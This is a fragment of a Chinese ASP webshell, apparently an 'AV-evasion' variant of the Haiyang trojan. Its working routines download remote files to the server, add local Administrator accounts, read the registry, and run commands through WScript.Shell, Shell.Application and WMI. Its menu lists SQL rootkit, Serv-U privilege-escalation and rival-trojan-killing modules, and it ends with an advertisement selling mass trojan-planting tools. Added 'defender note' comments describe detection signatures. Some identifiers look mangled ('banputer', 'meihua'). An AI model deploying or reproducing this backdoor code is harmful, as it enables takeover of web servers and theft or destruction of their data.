Case "addUser"
AddUser Request("userName"), Request("passWord")
Response.End
Case "readReg"
readReg()
Response.End
End Select
echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"
echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANmeihuaATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=meihua><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"
echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='meihuaTop' size=39>"
echo "<input name=passWord type=password value='meihuaTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"
echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\banputerName\banputerName\banputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedbanDrives,REG_SZ,0 {关闭网络共享}<br/>"
echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}<br/>"
echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网关}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
echo "-----------OVER--------------------<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}<br/>"
echo "==========================================================<br/>以上资料由kEvin1986提供"
echo "</span>"
echo "</form><hr/>"
echo "<script language=vbs>" & vbNewLine
echo "sub main()" & vbNewLine
echo "base=document.all.text9.value" & vbNewLine
echo "If IsNumeric(base) Then" & vbNewLine
echo "cc=hex(cstr(base))" & vbNewLine
echo "alert(""10进制为""&base)" & vbNewLine
echo "alert(""16进制为""&cc)" & vbNewLine
echo "exit sub" & vbNewLine
echo "end if" & vbNewLine
echo "aa=asc(cstr(base))" & vbNewLine
echo "bb=hex(aa)" & vbNewLine
echo "alert(""10进制为""&aa)" & vbNewLine
echo "alert(""16进制为""&bb)" & vbNewLine
echo "end sub" & vbNewLine
echo "sub main2()" & vbNewLine
echo "If document.all.vars.value<>"""" Then" & vbNewLine
echo "Dim nums,tmp,tmpstr,i" & vbNewLine
echo "nums=document.all.vars.value" & vbNewLine
echo "nums_len=Len(nums)" & vbNewLine
echo "For i=1 To nums_len" & vbNewLine
echo "tmp=Mid(nums,i,1)" & vbNewLine
echo "If IsNumeric(tmp) Then" & vbNewLine
echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
echo "Else" & vbNewLine
echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
echo "exit sub" & vbNewLine
echo "End If" & vbNewLine
echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
echo "End If" & vbNewLine
echo "tmpstr=tmpstr+tmp" & vbNewLine
echo "Next" & vbNewLine
echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
echo "End If" & vbNewLine
echo "end sub" & vbNewLine
echo "</script>" & vbNewLine
echo ""
End Sub
Sub downFromUrl()
' Server-side "download to disk": fetches Request("theUrl") with a synchronous
' MSXML2.XMLHTTP GET and writes the response body to Request("thePath") through
' an ADODB.Stream. Both the URL and the destination path come straight from the
' request, unvalidated. Reached from the form whose hidden field is
' theAct=downFromUrl (the dispatch Select Case is outside this procedure).
' Defender note: the ADODB.Stream + MSXML2.XMLHTTP pair and the
' theUrl/thePath/overWrite parameter names are the things to match in request
' logs; a successful call leaves a new file on disk written by the web process.
If isDebugMode = False Then
' Outside debug mode every error is suppressed; failures are only surfaced by
' the chkErr(Err) call near the end (chkErr is defined elsewhere in the file).
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("Adodb.Stream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
' SaveToFile option: 2 (adSaveCreateOverWrite) only when the form checkbox sent
' 2; anything else becomes 1 (adSaveCreateNotExist), so an existing file then
' makes SaveToFile fail instead of being replaced.
If overWrite <> 2 Then
overWrite = 1
End If
Http.Open "GET", theUrl, False
Http.Send()
' The request is synchronous (third Open argument False), so ReadyState should
' already be 4 here; this guard mainly catches a Send that failed under
' Resume Next.
If Http.ReadyState <> 4 Then
Exit Sub
End If
' ADO constants: Type 1 = adTypeBinary, Mode 3 = adModeReadWrite.
With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
' Err 3004 (ADO write-to-file failure) is taken to mean thePath is a directory:
' the last URL segment (or a fallback name) is appended and the save retried once.
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
chkErr(Err)
' Backslashes are doubled, presumably because alertThenClose (defined elsewhere)
' emits the message inside a client-side script string.
alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
Set Http = Nothing
Set Stream = Nothing
End Sub
Sub AddUser(strUser, strPassword)
' Creates the local account strUser with password strPassword through the ADSI
' WinNT provider and adds it to the local Administrators group, then echoes
' getUserInfo(strUser) (defined elsewhere). Called from the "addUser" case with
' Request("userName") / Request("passWord"). The menu text at the call site
' admits this "rarely succeeds", presumably because the web worker identity
' normally lacks the right to create accounts.
' Defender note: account creation plus Administrators membership change
' originating from the web server, done via GetObject("WinNT://.") - there is
' no CreateObject ProgID to match on, so watch the ADSI/SAM side instead.
If isDebugMode = False Then
' Errors are suppressed outside debug mode; chkErr(Err) is consulted after each
' step, but unless chkErr ends the request the later steps still execute even
' when an earlier one failed.
On Error Resume Next
End If
Dim banputer, theUser, theGroup
' "banputer" appears to be "computer" mangled by the hosting site; the same
' substitution shows up in registry key names rendered elsewhere on this page,
' so signatures written against this copy should allow for it.
Set banputer = Getobject("WinNT://.")
Set theGroup = GetObject("WinNT://./Administrators,group")
Set theUser = banputer.Create("User", strUser)
theUser.SetPassword(strPassword)
chkErr(Err)
theUser.SetInfo
chkErr(Err)
theGroup.Add theUser
chkErr(Err)
Set theUser = Nothing
Set banputer = Nothing
Set theGroup = Nothing
echo getUserInfo(strUser)
End Sub
Sub readReg()
' Reads the registry value named by Request("thePath") with wsX.RegRead (wsX is
' presumably a WScript.Shell instance created elsewhere in the file) and echoes
' it as <li> items. RegRead returns an array for REG_MULTI_SZ / REG_BINARY
' values, hence the IsArray branch; scalar values are printed on one line.
' Defender note: any key readable by the web process can be queried; the form
' pre-fills the ComputerName key and lists Winlogon / LanmanServer / Tcpip
' values as examples of what an operator would look at.
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, thePath, theArray
thePath = Request("thePath")
' echo thePath & "<br/>"
theArray = wsX.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
echo "<li>" & theArray(i)
Next
Else
echo "<li>" & theArray
End If
' Surfaces a missing/unreadable key after the fact (errors were swallowed
' above); chkErr is defined elsewhere in the file.
chkErr(Err)
End Sub
Sub myban()
' "Remote command execution" via WMI: renders a one-field form and, when
' Request("ok") is non-empty, calls SWbemLocator.ConnectServer with that raw
' value, builds a Win32_ProcessStartup with ShowWindow=12 and creates a process
' through Win32_Process.Create, writing the return code and the new PID.
' The form's default value shows the argument shape the author had in mind
' (host, namespace, user, password); nothing is validated before use.
' Defender note: WbemScripting.SWbemLocator + Win32_Process.Create from a web
' request is the signature here. The process literal "ban user" and the
' "banputer" identifiers elsewhere look mangled by the hosting site, so do not
' match on them verbatim. Local variables are undeclared (no Option Explicit in
' view), and the lowercase style differs from the rest of the file.
echo "<form name=""form1"" method=""post"" action=""?meihua=myban"">"
echo " 远程执行命令"
echo "<input name=""ok"" type=""text"" id=""ok"" value="""192.168.2.1","root/cimv2","administrator","xiaolu""" size=""70"">"
echo " <input type=""submit"" name=""Submit"" value=""提交"">"
echo "</form>"
if request("ok")<>"" then
set ww=server.createobject("wbemscripting.swbemlocator")
set cc=ww.connectserver(request("ok"))
set ss=cc.get("Win32_ProcessStartup")
Set oC=ss.SpawnInstance_
oC.ShowWindow=12
Set pp=cc.get("Win32_Process")
' Create's fourth argument receives the new process id (ByRef).
Response.Write pp.create("ban user",null,oC,intProcessID)
Response.Write "<br>"&intProcessID
Response.end
end if
end sub
Sub PageList()
' Renders the module menu (the banner identifies this as an "enhanced" build of
' the 海洋 ASP shell). Every entry links back to this page; the dispatcher keyed
' on the meihua / ado / sql / su / kill query parameters is presumably elsewhere
' in the file.
' Defender note: several COM ProgIDs are printed in pieces ("She"&T&"ll.Appl"&T&
' "ication", "WScri"&T&"pt.She"&T&"ll"). T is presumably an empty string, so the
' splitting only defeats naive static matching on the ProgID text; the banner's
' 免杀 ("AV evasion") wording confirms that intent. The "meihua" parameter name
' itself looks like a site-side substitution (cf. PATH_TRANmeihuaATED above).
' The final line is the distributor's advertisement, not functionality.
showTitle("功能模块列表")
echo "<base target=_blank>"
echo "海洋免杀增强美化版<hr/>"
echo "<ol><li><a href='?meihua=ServiceList'>系统服务信息</a></li>"
echo "<br/>"
echo "<li><a href='?meihua=infoAboutSrv'>服务器相关数据</a><br/>("
echo "<a href='?meihua=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录</a>)</li>"
echo "<li><a href='?meihua=objOnSrv'>服务器组件探针</a></li>"
echo "<li><a href='?meihua=userList'>系统用户及用户组信息</a></li>"
echo "<li><a href='?meihua=CSInfo'>客户端服务器交互信息</a></li>"
echo "<li><a href='?meihua=WsCmdRun'>WScri"&T&"pt.She"&T&"ll程序运行器</a></li>"
echo "<li><a href='?meihua=SaCmdRun'>She"&T&"ll.Appl"&T&"ication程序运行器</a></li>"
echo "<li><a href='?meihua=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
echo "<li><a href='?meihua=AppFileExplorer'>She"&T&"ll.Appl"&T&"ication文件浏览操作器</a></li>"
echo "<li><a href='?meihua=MsDataBase'>微软数据库查看/操作器</a></li>"
echo "<li><a href='?meihua=PageAddToMdb'>文件夹打包/解开器</a></li>"
echo "<li><a href='?meihua=TxtSearcher'>文本文件搜索器</a></li>"
echo "<li><a href='?meihua=OtherTools'>一些零碎的小东西</a></li>"
echo "<li><a href='?ado=newado'>Ado Exploit</a></li>"
echo "<li><a href='?sql=yes'>SqlRootKit 3.0</a></li>"
echo "<li><a href='?meihua=myban'>wmi远程执行命令</a></li>"
echo "<li><a href='?su=su'>SerV-U-ASP提权</a></li>"
echo "<li><a href='?kill=yes'>干掉非本人ASP木马</a></li>"
echo "</ol>"
echo "BY :MORFI! 本人出售批量挂马ASP程序,可以测试的!要的联系QQ:660083<hr/>"
End Sub
Sub PageSaCmdRun()
' Command runner built on Shell.Application.ShellExecute (saX, created elsewhere
' in the file). theAct=doAct launches Request("appName") (default cmd.exe) with
' Request("appArgs") in directory Request("appPath") with a hidden window; for
' cmd.exe the arguments are forced to start with "/c". theAct=readResult echoes
' the file at aspPath (module-level, defined elsewhere): the page's "回显" button
' appends " > <aspPath>" to the arguments so console output lands in that file,
' which the iframe then loads.
' Defender note: Shell.Application.ShellExecute from the web tier plus a
' web-readable output file. The page itself tells the operator to delete that
' temporary file afterwards, so its transient presence next to the script is a
' useful artefact to hunt for, as is the split ProgID used in showTitle.
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, thePath, theAct, appPath, appName, appArgs
showTitle("She"&T&"ll.Appl"&T&"ication命令行操作")
theAct = Trim(Request("theAct"))
appPath = Trim(Request("appPath"))
' thePath is read here but never used in this procedure.
thePath = Trim(Request("thePath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then
appName = "cmd.exe"
End If
' Normalise the working directory so it ends with a backslash.
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
' For cmd.exe make sure the argument string starts with "/c" (run and exit).
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
' Last argument 0 is the vShow value: the launched window is hidden.
saX.ShellExecute appName, appArgs, appPath, "", 0
chkErr(Err)
End If
If theAct = "readResult" Then
Err.Clear
' Prefer the ADODB.Stream reader (streamLoadFromFile, defined elsewhere); if it
' raised, fall back to FSO. The fallback is only reachable when On Error Resume
' Next is active, i.e. outside debug mode.
echo encode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fsoX.OpenTextFile(aspPath)
echo encode(theFile.ReadAll())
Set theFile = Nothing
End If
Response.End
End If
echo "<style>body{margin:8;border:none;background-color:#0099FF;}</style>"
' The onload handler name looks site-mangled (cf. "meihua" elsewhere on the page).
echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wmeihuaoadIFrame();', 3900);"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "<input type=hidden name=theAct value=doAct>"
echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
echo " 由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
echo "<iframe id=cmdResult style='width:100%;height:78%;'>"
echo "</iframe>"
echo "</form>"
echo "</body>"
End Sub
Sub PageServiceList()
' Lists every service exposed by the local ADSI WinNT provider (Filter =
' "Service") with name, display name, start type (getStartType, defined
' elsewhere), running state (Shell.Application.IsServiceRunning), logon
' account, registry description (getServiceDsc below) and binary path.
' Note the ordering: GetObject / CreateObject run before On Error Resume Next
' is enabled, so a failure to bind the provider or create the object is not
' swallowed here, whereas per-service property errors inside the loop are.
' Defender note: read-only reconnaissance, but it uses the same split ProgID
' "She"&T&"ll.Appl"&T&"ication" as the rest of the file - normalise such
' concatenations before matching.
Dim sa, objService, objbanputer
showTitle("系统服务信息查看")
Set objbanputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("She"&T&"ll.Appl"&T&"ication")
objbanputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objbanputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>"
' Only sa is released; objbanputer is left to go out of scope.
Set sa = Nothing
End Sub
Function getServiceDsc(strService)
' Returns the Description value stored under
' HKLM\SYSTEM\CurrentControlSet\Services\<strService>, reading it with a
' WScript.Shell created per call (ProgID split with x - presumably an empty
' string - for the same static-signature reason as the other split ProgIDs in
' this file) rather than reusing the wsX object used by readReg.
' No local error handling: a service without a Description value makes
' RegRead raise, and whether that is swallowed depends on the caller's On Error
' state (PageServiceList enables Resume Next before calling this).
Dim ws
Set ws = Server.CreateObject("WScr"&x&"ipt.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
Sub PageTxtSearcher()
Response.Buffer = True
Server.ScriptTimeOut = 5000
Dim keyword, theAct, thePath, theFolder
theAct = Request("theAct")
keyword = Trim(Request("keyword"))
thePath = Trim(Request("thePath"))
showTitle("文本文件搜索器")
If thePath = "" Then
thePath = Server.MapPath("\")
End If
echo "FSO文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?meihua=TxtSearcher&theAct=fsoSearch onsubmit=this.Submit.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """